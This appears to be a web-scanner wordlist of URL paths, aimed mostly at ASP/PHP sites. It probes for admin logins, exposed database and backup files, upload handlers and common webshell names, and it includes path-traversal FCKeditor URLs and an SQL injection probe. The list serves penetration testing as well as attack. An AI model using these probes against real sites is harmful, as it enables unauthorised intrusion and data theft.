/b_admin.php
/b2b_sysdata.asp
/b2b_sysdata.aspx
/b2b_sysdata.php
/Back
/back.asp
/back.aspx
/back.php
/Back/
/back/login.asp
/back/login.aspx
/back/login.php
/BackAdm
/backadm.asp
/backadm.aspx
/backadm.php
/BackAdm/
/BackAdmin
/BackAdmin/
/BackAdmins
/BackAdmins/
/BackEnd
/BackEnd/
/BackUp
/backup.asp
/backup.aspx
/backup.php
/backup.rar
/backup.zip
/backup/
/backups
/backups/
/banneradmin
/baoming.asp
/baoming.aspx
/baoming.php
/base64.asp
/base64.aspx
/base64.php
/basedadmin
/basedadmin.asp
/basedadmin/
/basedadmin/admin_login.asp
/basedadmin/admin_login.aspx
/basedadmin/admin_login.php
/bbadmin
/Bbs
/bbs.asp
/bbs.aspx
/bbs.php
/bbs/
/bbs/2fly_gift.php
/bbs/admin/login
/bbs/admin_index.asp
/bbs/admin_index.aspx
/bbs/admin_index.php
/bbs/admin_login.asp
/bbs/admin_login.aspx
/bbs/admin_login.php
/bbs/auction.php
/bbs/cdkey.php?
/bbs/Databackup/dvbbs.MDB
/bbs/diy.asp
/bbs/diy.aspx
/bbs/diy.php
/bbs/down_addsoft.asp
/bbs/down_addsoft.aspx
/bbs/down_addsoft.php
/bbs/down_picupfile.asp
/bbs/down_picupfile.aspx
/bbs/down_picupfile.php
/bbs/elogin.asp
/bbs/elogin.aspx
/bbs/elogin.php
/bbs/groupshow.php?agid=-2
/bbs/login.asp
/bbs/login.aspx
/bbs/login.php
/bbs/post_upfile.asp
/bbs/post_upfile.aspx
/bbs/post_upfile.php
/bbs/post_upload.asp
/bbs/post_upload.aspx
/bbs/post_upload.php
/bbs/reg_upload.asp
/bbs/reg_upload.aspx
/bbs/reg_upload.php
/bbs/saveup.asp
/bbs/saveup.aspx
/bbs/saveup.php
/bbs/upfile.asp
/bbs/upfile.aspx
/bbs/upfile.php
/bbs/upload_soft.asp
/bbs/upload_soft.aspx
/bbs/upload_soft.php
/Bbs1
/bbs1.asp
/bbs1.aspx
/bbs1.php
/Bbs1/
/bbs-data/
/bbsLogin.Asp
/bbsLogin.aspx
/bbsLogin.php
/bbslogin/
/bbss/
/bbsxp/
/bdunion.txt
/bestcollegepicks/
/bestcollegepicks/login.asp
/bestcollegepicks/login.aspx
/bestcollegepicks/login.php
/bigadmin
/bin
/bin/
/binaries
/binaries/
/binary
/binary/
/bizarre
/bizarre/
/black
/black/
/blog
/blog.asp
/blog.aspx
/blog.php
/blog/
/blogdata/
/blogDB/
/blogindex
/bm/chkadmin.asp
/bm/chkadmin.aspx
/bm/chkadmin.php
/book
/book.asp
/book.aspx
/book.php
/book/
/book/login.asp
/book/login.aspx
/book/login.php
/book1/
/book1/login.asp
/book1/login.aspx
/book1/login.php
/books
/books/
/boss/
/boss/admin.asp
/boss/admin.aspx
/boss/admin.php
/boss/admin_login.asp
/boss/admin_login.aspx
/boss/admin_login.php
/boss/login.asp
/boss/login.aspx
/boss/login.php
/boss/WebEditor/admin_login.asp
/boss/WebEditor/admin_login.aspx
/boss/WebEditor/admin_login.php
/boss/WebEditor/db/ewebeditor.mdb
/bottom.asp
/bottom.aspx
/bottom.php
/build.asp
/build.aspx
/build.php
/c
/c/
/c99.asp
/c99.aspx
/c99.php
/cadmins
/cao.asp
/cao.aspx
/cao.php
/caonima.asp
/caonima.aspx
/caonima.php
/careerfocus/
/careerfocus/Login.asp
/careerfocus/Login.aspx
/careerfocus/Login.php
/cat
/cat/
/catalog
/catalog/
/catalogs
/catalogs/
/ccms/
/ccms/index.asp
/ccms/index.aspx
/ccms/index.php
/ccms/login.asp
/ccms/login.aspx
/ccms/login.php
/ccp14admin
/cdkey.php?
/CEO.asp
/CEO.aspx
/CEO.php
/ceoadmin.asp
/ceoadmin.aspx
/ceoadmin.php
/cert/
/certif
/certif/
/certificate
/certificate/
/certificates
/certificates/
/certified
/certified/
/certify
/certify/
/cfg
/cfg.asp
/cfg.aspx
/cfg.php
/cfg/
/cgi
/cgi/
/cgibin
/cgi-bin
/cgibin/
/cgi-bin/
/cgi-bin/login.asp
/cgi-bin/login.aspx
/cgi-bin/login.php
/cgi-bin/System/Userlogin.asp
/cgi-bin/System/Userlogin.aspx
/cgi-bin/System/Userlogin.php
/change_password.asp
/change_password.aspx
/change_password.php
/changepass.asp
/changepass.aspx
/changepass.php
/changepwd.asp
/changepwd.aspx
/changepwd.php
/Char.asp
/Char.aspx
/Char.php
/Check
/check.asp
/check.aspx
/check.php
/Check/
/CheckLogin
/CheckLogin/
/chkadmin
/chkadmin.asp
/chkadmin.aspx
/chkadmin.php
/chkadmin/
/chklogin
/chklogin.asp
/chklogin.aspx
/chklogin.php
/chklogin/
/cipher.asp
/cipher.aspx
/cipher.php
/Cityadmin/
/cjcx/
/cjcx/login.asp
/cjcx/login.aspx
/cjcx/login.php
/cmd.asp
/cmd.aspx
/cmd.php
/cmdasp.asp
/cmdasp.aspx
/cmdasp.php
/cms/
/cmsadmin
/cmseditor/
/cmseditor/db/ewebeditor.mdb
/CmsEditor/Upload.asp 
/CmsEditor/Upload.aspx 
/CmsEditor/Upload.php 
/cn/
/cnkdata/
/cnlogin/
/cnzz/
/code
/code.asp
/code.asp.bak
/code.aspx
/code.aspx.bak
/code.php
/code.php.bak
/code/
/codes
/codes/
/coding
/coding/
/College
/College/
/college/index.asp
/college/index.aspx
/college/index.php
/Comm
/Comm/
/command.asp
/command.aspx
/command.php
/commentedit.htm
/common
/common.asp
/common.aspx
/common.php
/common/
/Conf
/conf.asp
/conf.aspx
/conf.php
/Conf/
/config
/config.asp
/config.asp.bak
/config.aspx
/config.aspx.bak
/config.inc
/config.php
/config.php.bak
/config/
/configuration
/configure
/conn.asp
/conn.asp.bak
/conn.aspx
/conn.aspx.bak
/conn.php
/conn.php.bak
/conn.txt
/connect/
/connection.asp
/connection.asp.bak
/connection.aspx
/connection.aspx.bak
/connection.php
/connection.php.bak
/connector.asp
/connector.aspx
/connector.php
/connstr.asp
/connstr.aspx
/connstr.php
/Console
/console.asp
/console.aspx
/console.php
/Console/
/Console/Login
/Console/Login/
/const.asp
/const.aspx
/const.php
/consts.asp
/consts.aspx
/consts.php
/content
/content/
/contents
/contents/
/Control/
/controlpanel
/controlpanel.asp
/controlpanel.aspx
/controlpanel.html
/controlpanel.php
/ControlPanel/
/count.asp
/count.aspx
/count.php
/count/
/count/supervise/Login.asp
/count/supervise/Login.aspx
/count/supervise/Login.php
/count_admin
/count_admin.asp
/count_admin.aspx
/count_admin.php
/count_admin/
/Cp
/cp.asp
/cp.aspx
/cp.html
/cp.php
/Cp/
/cpanel
/cpanel_file
/cpgl/
/crack
/crack/
/cracks
/cracks/
/crackz
/crackz/
/create.asp
/create.aspx
/create.php
/Create_Commend.asp
/Create_Commend.aspx
/Create_Commend.php
/Create_Default.asp
/Create_Default.aspx
/Create_Default.php
/Create_jsNews.asp
/Create_jsNews.aspx
/Create_jsNews.php
/Create_jsSearch.asp
/Create_jsSearch.aspx
/Create_jsSearch.php
/Create_New.asp
/Create_New.aspx
/Create_New.php
/Create_Other.asp
/Create_Other.aspx
/Create_Other.php
/Create_SoftCate.asp
/Create_SoftCate.aspx
/Create_SoftCate.php
/Create_SoftList_All.asp
/Create_SoftList_All.aspx
/Create_SoftList_All.php
/Create_SoftList_Cate.asp
/Create_SoftList_Cate.aspx
/Create_SoftList_Cate.php
/crypto.asp
/crypto.aspx
/crypto.php
/cshell.asp
/cshell.aspx
/cshell.php
/css.asp
/css.aspx
/css.php
/customer_login
/cx/
/cxhd.asp
/cxhd.aspx
/cxhd.php
/cz_login.asp
/cz_login.aspx
/cz_login.php
/d
/d99.asp
/d99.aspx
/d99.php
/daemon.asp
/daemon.aspx
/daemon.php
/dama.asp
/dama.aspx
/dama.php
/darkst.asp
/darkst.aspx
/darkst.php
/data
/data.asp
/data.aspx
/data.php
/Data.project/
/data.rar
/data.zip
/data/
/Data_Backup.asp
/Data_Backup.aspx
/Data_Backup.php
/data_jk/
/Data_Return.asp
/Data_Return.aspx
/Data_Return.php
/DataBackup/
/databak.rar
/databak.zip
/database
/database.asp
/database.aspx
/database.php
/database.rar
/database.zip
/database/
/database/%23Database.mdb
/database/%23Database_bak.mdb
/database_administration
/databases.asp
/databases.aspx
/databases.php
/databases/
/Databases/0791idc.mdb
/DataCy/
/datashop.asp
/datashop.aspx
/datashop.php
/db.asp
/db.aspx
/db.php
/db/
/db/ewebeditor.mdb
/db_con.asp
/db_con.aspx
/db_con.php
/DB_UserData/
/dbase.asp
/dbase.aspx
/dbase.php
/dbase/
/dbb.asp
/dbb.aspx
/dbb.php
/dbconn.asp
/dbconn.aspx
/dbconn.php
/dbconn_logo.asp
/dbconn_logo.aspx
/dbconn_logo.php
/DbConnect.asp
/DbConnect.aspx
/DbConnect.php
/debug
/debug/
/decrypt.asp
/decrypt.aspx
/decrypt.php
/dede/
/dede_admin.txt
/dede_bbs/
/defalut.html
/Default
/default.asp
/default.asp.bak
/default.aspx
/default.aspx.bak
/default.htm
/default.php
/default.php.bak
/default/
/default_1.asp
/default_1.asp.bak
/default_1.aspx
/default_1.aspx.bak
/default_1.php
/default_1.php.bak
/default_admin.asp
/default_admin.aspx
/default_admin.php
/Default_Default.asp?
/Default_Default.aspx?
/Default_Default.php?
/default_Image.asp
/default_Image.aspx
/default_Image.php
/Default_index.asp
/Default_index.aspx
/Default_index.php
/default_login.asp
/default_login.aspx
/default_login.php
/default_right.asp
/default_right.aspx
/default_right.php
/default1.asp
/default1.asp.bak
/default1.aspx
/default1.aspx.bak
/default1.php
/default1.php.bak
/default2.asp
/default2.asp.bak
/default2.aspx
/default2.aspx.bak
/default2.php
/default2.php.bak
/del.asp
/del.aspx
/del.php
/del_admin.asp
/del_admin.aspx
/del_admin.php
/del_member.asp
/del_member.aspx
/del_member.php
/delete.asp
/delete.aspx
/delete.php
/delete/
/deletemember.asp
/deletemember.aspx
/deletemember.php
/denglu
/denglu.asp
/denglu.aspx
/denglu.php
/denglu/
/denglu/admin.asp
/denglu/admin.aspx
/denglu/admin.php
/devel.asp
/devel.aspx
/devel.php
/devel/
/dhtml
/dhtml/
/digshell0.asp
/digshell0.aspx
/digshell0.php
/digshell2.asp
/digshell2.aspx
/digshell2.php
/dir
/dir/
/directadmin
/dir-login
/dirs
/dirs/
/diy.asp
/diy.aspx
/diy.php
/diy3.asp
/diy3.aspx
/diy3.php
/dl
/dl.asp
/dl.aspx
/dl.php
/dl/
/dm.asp
/dm.aspx
/dm.php
/dns/
/do.asp
/do.aspx
/do.php
/doc
/doc/
/docs
/docs/
/door
/door/
/double
/double/
/down
/down.asp
/down.aspx
/down.htm
/down.php
/down/
/down/login
/down/login.asp
/down/login.aspx
/down/login.php
/down_addsoft.asp
/down_addsoft.aspx
/down_addsoft.php
/down_picupfile.asp
/down_picupfile.aspx
/down_picupfile.php
/down_picupload.asp
/down_picupload.aspx
/down_picupload.php
/download
/download.asp
/download.aspx
/download.php
/download/
/downloads
/downloads/
/downloadz
/downloadz/
/downlogin.asp
/downlogin.aspx
/downlogin.php
/driver
/driver/
/drivers
/drivers/
/dtest.asp
/dtest.aspx
/dtest.php
/dvbbs.asa
/dvbbs/
/dvbbs/down_addsoft.asp
/dvbbs/down_addsoft.aspx
/dvbbs/down_addsoft.php
/dvbbs/post_upfile.asp
/dvbbs/post_upfile.aspx
/dvbbs/post_upfile.php
/dvbbs/post_upload.asp
/dvbbs/post_upload.aspx
/dvbbs/post_upload.php
/dvbbs/reg_upload.asp
/dvbbs/reg_upload.aspx
/dvbbs/reg_upload.php
/dvbbs/saveup.asp
/dvbbs/saveup.aspx
/dvbbs/saveup.php
/dvbbs/upfile.asp
/dvbbs/upfile.aspx
/dvbbs/upfile.php
/dvbbs/upload_soft.asp
/dvbbs/upload_soft.aspx
/dvbbs/upload_soft.php
/dvboke.asp
/dvboke.aspx
/dvboke.php
/DvForum/
/dxxobbs/
/dxxobbs/upload.asp
/dxxobbs/upload.aspx
/dxxobbs/upload.php
/dxy/
/e
/e/
/EAdmin
/EAdmin/
/eadmin/login.asp
/eadmin/login.aspx
/eadmin/login.php
/edi/admin/login.asp
/edi/admin/login.aspx
/edi/admin/login.php
/Edit
/edit.asp
/edit.aspx
/edit.php
/edit/
/edit/admin_login.asp
/edit/admin_login.aspx
/edit/admin_login.php
/edit/db/ewebeditor.mdb
/EditBox/
/editmember.asp
/editmember.aspx
/editmember.php
/editmember/
/Editor
/editor/
/editor/admin_login.asp
/editor/admin_login.asp?
/editor/admin_login.aspx
/editor/admin_login.aspx?
/editor/admin_login.php
/editor/admin_login.php?
/editor/db/ewebeditor.mdb
/editor/editor/filemanager/upload/test.html
/editor/filemanager/browser/default/browser.html
/editor/filemanager/upload/test.html
/editor/upload.asp 
/editor/upload.aspx 
/editor/upload.php 
/edituser.asp
/edituser.aspx
/edituser.php
/edituser/
/elogin.asp
/elogin.aspx
/elogin.php
/email
/email.asp
/email.aspx
/email.php
/email/
/emails
/emails/
/emyuser_login.asp
/emyuser_login.aspx
/emyuser_login.php
/en_US
/en_US/
/encrypt.asp
/encrypt.aspx
/encrypt.php
/end.asp
/end.aspx
/end.php
/eneya/
/eneya888/
/enterprise/upfile.asp
/enterprise/upfile.aspx
/enterprise/upfile.php
/entry
/entry/
/err.asp
/err.aspx
/err.php
/error.asp
/error.aspx
/error.php
/esuper
/esuper/
/esuperadmin
/esuperadmin/
/event
/event/
/ew/
/eWeb/admin_login.asp
/eWeb/admin_login.aspx
/eWeb/admin_login.php
/eWeb/db/ewebeditor.mdb
/ewebedit/
/ewebedit/db/ewebeditor.mdb
/ewebedit/ewebeditor.asp
/ewebedit/ewebeditor.aspx
/ewebedit/ewebeditor.php
/eWebEditor
/ewebeditor.asp
/ewebeditor.asp?id=x&style=standard
/ewebeditor.aspx
/ewebeditor.aspx?id=x&style=standard
/ewebeditor.mdb
/ewebeditor.php
/ewebeditor.php?id=x&style=standard
/ewebeditor/
/eWebEditor/Admin
/eWebEditor/admin_login.asp
/eWebEditor/admin_login.aspx
/eWebEditor/admin_login.php
/ewebeditor/asp/browse.asp
/ewebeditor/asp/browse.aspx
/ewebeditor/asp/browse.php
/eWebEditor/db/ewebeditor.mdb
/eWebEditor_v280_Free/admin_login.asp
/eWebEditor_v280_Free/admin_login.aspx
/eWebEditor_v280_Free/admin_login.php
/eWebEditor_v280_Free/db/ewebeditor.mdb
/ewebeditor1013.asp
/ewebeditor1013.aspx
/ewebeditor1013.php
/ewebeitor.htm
/ewebsoft/admin_login.asp
/ewebsoft/admin_login.aspx
/ewebsoft/admin_login.php
/exit.asp
/exit.aspx
/exit.php
/eye2007/
/eye2007Admin_login.asp
/eye2007Admin_login.aspx
/eye2007Admin_login.php
/eye2008/
/eye2009/
/ezsqliteadmin
/f
/f/
/FCKeditor
/FCKeditor/
/FCKeditor/editor/
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.php
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspxx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.phpx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.php
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/browser/default/frmupload.html
/fckeditor/editor/filemanager/upload/test.html
/fdnews.asa
/fdnews.asp
/fdnews.aspx
/fdnews.php
/file
/file.asp
/file.aspx
/file.php
/file/
/fileadmin
/fileadmin.asp
/fileadmin.aspx
/fileadmin.html
/fileadmin.php
/filemanager/
/files
/files.asp
/files.aspx
/files.php
/files/
/fileup.asp
/fileup.aspx
/fileup.php
/fileupimg2.asp
/fileupimg2.aspx
/fileupimg2.php
/filez
/filez/
/final
/final/
/findaccount.asp
/findaccount.aspx
/findaccount.php
/findpassword.asp
/findpassword.aspx
/findpassword.php
/Fl_Web.asp
/Fl_Web.aspx
/Fl_Web.php
/food
/food/
/Foosun_Data/
/foot.asp
/foot.aspx
/foot.php
/forbook1.asp
/forbook1.aspx
/forbook1.php
/format.asp
/format.aspx
/format.php
/formslogin
/Forum
/forum.asp
/forum.aspx
/forum.php
/forum/
/forum/upfile.asp
/forum/upfile.aspx
/forum/upfile.php
/forumdata/cache/usergroup_0.asp
/forumdata/cache/usergroup_0.aspx
/forumdata/cache/usergroup_0.php
/fpv_admin/
/fpv_admin/admin.asp
/fpv_admin/admin.aspx
/fpv_admin/admin.php
/frame.asp
/frame.aspx
/frame.php
/free
/free/
/freepic
/freepic/
/freepics
/freepics/
/freeweb_admin.asp
/freeweb_admin.aspx
/freeweb_admin.php
/front
/front/
/FTB/
/ftp
/ftp.txt
/ftp/
/Fuck
/fuck.asa
/fuck.asp
/fuck.aspx
/fuck.php
/Fuck/
/fucks
/fucks/
/fuckyou.asp
/fuckyou.aspx
/fuckyou.php
/funciton.asp.bak
/funciton.aspx.bak
/funciton.php.bak
/function.asp
/function.aspx
/function.php
/Function/UploadProductPic.asp
/Function/UploadProductPic.aspx
/Function/UploadProductPic.php
/Fy_SqlX.Asp
/Fy_SqlX.aspx
/Fy_SqlX.php
/g
/g/
/g_admin.asp
/g_admin.aspx
/g_admin.php
/g_admin/
/gal
/gal/
/galleries
/galleries/
/gallery
/gallery/
/galls
/game
/game/
/games
/games/
/gamez
/gamez/
/Gas_login.asp
/Gas_login.aspx
/Gas_login.php
/Gb
/Gb/
/gb/register.asp
/gb/register.aspx
/gb/register.php
/gbook.asp
/gbook.aspx
/gbook.php
/gbook/
/gbook/login.asp
/gbook/login.aspx
/gbook/login.php
/geoip.inc
/get.htm
/getpass.asp
/getpass.aspx
/getpass.php
/GetPassword.asp
/GetPassword.aspx
/GetPassword.php
/GfEditor/
/gg/
/gg_login.asp
/gg_login.aspx
/gg_login.php
/ggfb.asp
/ggfb.aspx
/ggfb.php
/ggjdsd/
/girl
/girl.asp
/girl.aspx
/girl.php
/girl/
/girls
/girls.asp
/girls.aspx
/girls.php
/girls/
/girlz
/girlz/
/gl
/gl.asp
/gl.aspx
/gl.jsp
/gl.php
/gl/
/gl/adminlogin.asp
/gl/adminlogin.aspx
/gl/adminlogin.php
/gladmin.asp
/gladmin.aspx
/gladmin.aspxx
/gladmin.jsp
/gladmin.php
/gladmin.phpx
/gladmin/login.asp
/gladmin/login.aspx
/gladmin/login.php
/gldl.asp
/gldl.aspx
/gldl.php
/gllogin.asp
/gllogin.aspx
/gllogin.aspxx
/gllogin.jsp
/gllogin.php
/gllogin.phpx
/global.asa
/global.asp
/global.aspx
/global.inc
/global.mdb
/global.php
/global.txt
/globes_admin
/gly
/gly/
/gm/
/go.asp
/go.aspx
/go.php
/graph
/graph/
/graphic
/graphic/
/graphics
/graphics/
/graphs
/graphs/
/groupshow.php?agid=-2 order by 50 #
/gsjj.asp
/gsjj.aspx
/gsjj.php
/guan
/guan/guanli.asp
/guan/guanli.aspx
/guan/guanli.php
/guanli
/guanli.asp
/guanli.aspx
/guanli.php
/guanli/
/guanli/admin.asp
/guanli/admin.aspx
/guanli/admin.php
/guanli/denglu/
/guanli/index.asp
/guanli/index.aspx
/guanli/index.php
/guanli/login.asp
/guanli/login.aspx
/guanli/login.php
/guanli_admin/
/guanliadmin.asp
/guanliadmin.aspx
/guanliadmin.jsp
/guanliadmin.php
/guanli-cn.asp
/guanli-cn.aspx
/guanli-cn.php
/guanlilog.asp
/guanlilog.aspx
/guanlilog.jsp
/guanlilog.php
/guanlilogin.asp
/guanlilogin.aspx
/guanlilogin.jsp
/guanlilogin.php
/guanli-tw.asp
/guanli-tw.aspx
/guanli-tw.php
/guanliyuan
/guanliyuan.asp
/guanliyuan.aspx
/guanliyuan.jsp
/guanliyuan.php
/guanliyuan/
/guest/
/guest/login.asp
/guest/login.aspx
/guest/login.php
/GuestBook
/guestbook/
/guestbook/login.asp
/guestbook/login.aspx
/guestbook/login.php
/guestbook/man.asp
/guestbook/man.aspx
/guestbook/man.php
/guli/login.asp
/guli/login.aspx
/guli/login.php
/h
/h/
/hack.asa
/hack.asp
/hack.aspx
/hack.php
/hacker.asa
/hacker.asp
/hacker.aspx
/hacker.php
/hardcore
/hardcore/
/hate.asp
/hate.aspx
/hate.php
/head.asp
/head.aspx
/head.php
/health/
/hege.asp
/hege.aspx
/hege.php
/heiren.asp
/heiren.aspx
/heiren.php
/Hello
/hello.asp
/hello.aspx
/hello.php
/Hello/
/help
/help.txt
/help/
/hidden
/hidden/
/hide
/hide/
/home
/home/
/houtai
/houtai.asp
/houtai.aspx
/houtai.php
/houtai/
/houtai/admin.asp
/houtai/admin.aspx
/houtai/admin.php
/houtai/Admin_Login.asp
/houtai/Admin_Login.aspx
/houtai/Admin_Login.php
/houtaidenglu
/houtaidenglu/
/houtaiguanli
/houtaiguanli.asp
/houtaiguanli.aspx
/houtaiguanli.php
/houtaiguanli/
/hpwebjetadmin
/Hradmin/admin.asp
/Hradmin/admin.aspx
/Hradmin/admin.php
/ht
/ht.asp
/ht.aspx
/ht.php
/ht/
/htdl
/htdl/
/htdoc
/htdoc/
/htdocs
/htdocs.asp
/htdocs.aspx
/htdocs.php
/htdocs/
/htgl
/htgl.asp
/htgl.aspx
/htgl.php
/htgl/
/htmedit/
/htmedit/admin_login.asp
/htmedit/admin_login.aspx
/htmedit/admin_login.php
/htmedit/db/ewebeditor.mdb
/html
/html/
/htmledit/
/HX_LOGIN.ASP
/HX_LOGIN.aspx
/HX_LOGIN.php
/HxData/
/HXMYDATABASE/
/HYTop.mdb
/hywindow/
/Hz@host!.asp 
/Hz@host!.aspx 
/Hz@host!.php 
/i
/i/
/id
/id/
/id_pass.asp
/id_pass.aspx
/id_pass.php
/idea.asp
/idea.aspx
/idea.php
/idea/
/ideas.asp
/ideas.aspx
/ideas.php
/ideas/
/ids
/ids/
/image
/image/
/ImageGallery.aspx?rif=/&cif=../&ftb=reProduct_content2
/ImageGallery.aspxx?rif=/&cif=../&ftb=reProduct_content2
/ImageGallery.phpx?rif=/&cif=../&ftb=reProduct_content2
/Images
/Images/
/images_dir
/images_dir/
/imagez
/imagez/
/img/
/img_upfile.asp
/img_upfile.aspx
/img_upfile.php
/inadmin.asp
/inadmin.aspx
/inadmin.php
/Inc
/inc.asp
/inc.asp.bak
/inc.aspx
/inc.aspx.bak
/inc.php
/inc.php.bak
/Inc/
/inc/config.asp
/inc/config.aspx
/inc/config.php
/inc/upload_flash.asp
/inc/upload_flash.aspx
/inc/upload_flash.php
/inc_config.asp
/inc_config.aspx
/inc_config.php
/incFiles/load_gg.asp
/incFiles/load_gg.aspx
/incFiles/load_gg.php
/include
/include.asp
/include.aspx
/include.php
/include/
/include/upfile.asp
/include/upfile.aspx
/include/upfile.php
/include/upfile_asp.asp
/include/upfile_asp.aspx
/include/upfile_asp.php
/include/upload.asp
/include/upload.aspx
/include/upload.php
/include/upload_asp.asp
/include/upload_asp.aspx
/include/upload_asp.php
/includeinc.asp
/includeinc.aspx
/includeinc.php
/includeinc//
/includes
/includes.asp
/includes.aspx
/includes.php
/includes/
/incoming.asp
/incoming.aspx
/incoming.php
/incoming/
/index
/index.asp
/index.asp.bak
/index.aspx
/index.aspx.bak
/index.htm
/index.html
/index.php
/index.php.bak
/index/
/index_admin
/index_admin.asp
/index_admin.aspx
/index_admin.php
/index_admin/
/index_Default.asp?
/index_Default.aspx?
/index_Default.php?
/index_manage
/index_manage.asp
/index_manage.aspx
/index_manage.php
/index_manage/
/index_test.asp
/index_test.aspx
/index_test.php
/index0.asp
/index0.aspx
/index0.php
/index1.asp
/index1.asp.bak
/index1.aspx
/index1.aspx.bak
/index1.php
/index1.php.bak
/indexadmin
/indexadmin.asp
/indexadmin.aspx
/indexadmin.php
/indexadmin/
/indexDefault.asp?
/indexDefault.aspx?
/indexDefault.php?
/indexximg/
/Indy_admin
/Indy_admin/
/InFile
/inFile.asp
/inFile.aspx
/inFile.php
/InFile/
/info
/info.asp
/info.aspx
/info.php
/info.txt
/infom_login.asp
/infom_login.aspx
/infom_login.php
/inforadmin.asp
/inforadmin.aspx
/inforadmin.php
/infos_admin/
/insert.asp
/insert.aspx
/insert.php
/InSide
/inside.asp
/inside.aspx
/inside.php
/inside/
/install.asp
/install.aspx
/install.php
/install/
/InTranet
/intranet.asp
/intranet.aspx
/intranet.php
/InTranet/
/irc-macadmin
/j
/j/
/job/
/joekoe_data.asp
/joekoe_data.aspx
/joekoe_data.php
/js.asp
/js.aspx
/js.php
/jswadmin.asp
/jswadmin.aspx
/jswadmin.php
/k
/k/
/kefu/
/Kes/
/Kes/Admin/Admin_Login.asp
/Kes/Admin/Admin_Login.aspx
/Kes/Admin/Admin_Login.php
/KesAdmin_Login.asp
/KesAdmin_Login.aspx
/KesAdmin_Login.php
/key.asp
/key.aspx
/key.php
/kfuser/
/kill.asa
/kill.asp
/kill.aspx
/kill.php
/KS_Data/
/kwadmin/
/kwadmin/A_Login.asp
/kwadmin/A_Login.aspx
/kwadmin/A_Login.php
/kycj/kycj/login.asp
/kycj/kycj/login.aspx
/kycj/kycj/login.php
/l
/l/
/l888/
/land.asp
/land.aspx
/land.php
/land/
/land/land.asp
/land/land.aspx
/land/land.php
/language/
/lavery_Edit/Admin_Login.asp
/lavery_Edit/Admin_Login.aspx
/lavery_Edit/Admin_Login.php
/law/
/left.asp
/left.aspx
/left.htm
/left.html
/left.php
/lennyash.asp
/lennyash.aspx
/lennyash.php
/les
/Les/
/lesb
/lesb/
/lesbian
/lesbian/
/lesbians
/lesbians/
/lesbo
/lesbo/
/lez
/lez/
/liaoxd.asp
/liaoxd.aspx
/liaoxd.php
/Library/
/Library/DbConnect.asp
/Library/DbConnect.aspx
/Library/DbConnect.php
/License.txt
/link
/link.asa
/link.asp
/link.aspx
/link.php
/link/
/Link/admin/
/link/admin_login.asp
/link/admin_login.aspx
/link/admin_login.php
/Link/link_admin/
/Link/login/
/Link/upload/upload.asp
/Link/upload/upload.aspx
/Link/upload/upload.php
/link_admin.asp
/link_admin.aspx
/link_admin.php
/links
/links.asp
/links.aspx
/links.php
/links/
/linkz
/linkz/
/list
/list.asp
/list.aspx
/list.php
/list/
/liuyan/
/liuyan/login.asp
/liuyan/login.aspx
/liuyan/login.php
/LiveUser_Admin
/Llyj/
/Local
/local.asp
/local.aspx
/local.php
/Local/
/localhost/
/localhostlogin.asp
/localhostlogin.aspx
/localhostlogin.php
/Log
/log.asp
/log.aspx
/Log.htm
/log.php
/Log/
/logger.asp
/logger.aspx
/logger.php
/logi.asp
/logi.aspx
/logi.php
/login
/login.asa
/login.asp
/login.aspx
/login.aspxx
/login.htm
/login.html
/login.jsp
/login.php
/login.phpx
/login/
/Login/Admin
/login/admin.asp
/login/admin.aspx
/login/admin.php
/login/admin/admin.asp
/login/admin/admin.aspx
/login/admin/admin.php
/login/Default.asp?
/login/Default.aspx?
/login/Default.php?
/login/index
/login/index.asp
/login/index.aspx
/login/index.php
/login/login
/login/login.asp
/login/login.aspx
/login/login.php
/login/logout.asp
/login/logout.aspx
/login/logout.php
/login/super
/login/super.asp
/login/super.aspx
/login/super.php
/login_A.html
/login_admin.asp
/login_admin.aspx
/login_admin.php
/login_admin/
/login_check.asp
/login_check.aspx
/login_check.php
/login_db
/login_Default.asp?
/login_Default.aspx?
/login_Default.php?
/login_form_admin.htm
/Login_From
/login_from.asp
/login_from.aspx
/login_from.php
/Login_From/
/login_in.asp
/login_in.aspx
/login_in.php
/login_manage.asp
/login_manage.aspx
/login_manage.php
/login_message.asp
/login_message.aspx
/login_message.php
/Login_ok.asp
/Login_ok.aspx
/Login_ok.php
/login_out.asp
/login_out.aspx
/login_out.php
/login_out/
/login1
/login1.asp
/login1.aspx
/login1.php
/login1/
/loginadmin.asp
/loginadmin.aspx
/loginadmin.php
/loginDefault.asp?
/loginDefault.aspx?
/loginDefault.php?
/loginerror.asp
/loginerror.aspx
/loginerror.php
/loginflat
/loginform.asp
/loginform.aspx
/loginform.php
/loginini.asp
/loginini.aspx
/loginini.php
/loginManage.asp
/loginManage.aspx
/loginManage.php
/loginok.asp
/loginok.aspx
/loginok.php
/LoginPage.do
/login-redirect
/loginsave.asp
/loginsave.aspx
/loginsave.php
/loginsuper.asp
/loginsuper.aspx
/loginsuper.php
/loginsys.asp
/loginsys.aspx
/loginsys.php
/login-us
/logn/
/logo.asp
/logo.aspx
/logo.php
/logo_sysadmin
/Logon
/logon.asp
/logon.aspx
/logon.php
/logout.asp
/logout.aspx
/logout.htm
/logout.html
/logout.php
/logout/
/logsys.asp
/logsys.aspx
/logsys.php
/LookupPass.asp
